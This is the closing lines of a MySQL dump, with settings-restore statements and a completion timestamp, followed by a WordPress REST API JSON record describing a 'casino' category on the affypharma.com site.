/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2024-06-28 20:33:53

{"id":24,"count":1,"description":"","link":"https:\/\/affypharma.com\/category\/casino\/","name":"casino","slug":"casino","taxonomy":"category","parent":0,"meta":[],"_links":{"self":[{"href":"https:\/\/affypharma.com\/wp-json\/wp\/v2\/categories\/24"}],"collection":[{"href":"https:\/\/affypharma.com\/wp-json\/wp\/v2\/categories"}],"about":[{"href":"https:\/\/affypharma.com\/wp-json\/wp\/v2\/taxonomies\/category"}],"wp:post_type":[{"href":"https:\/\/affypharma.com\/wp-json\/wp\/v2\/posts?categories=24"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}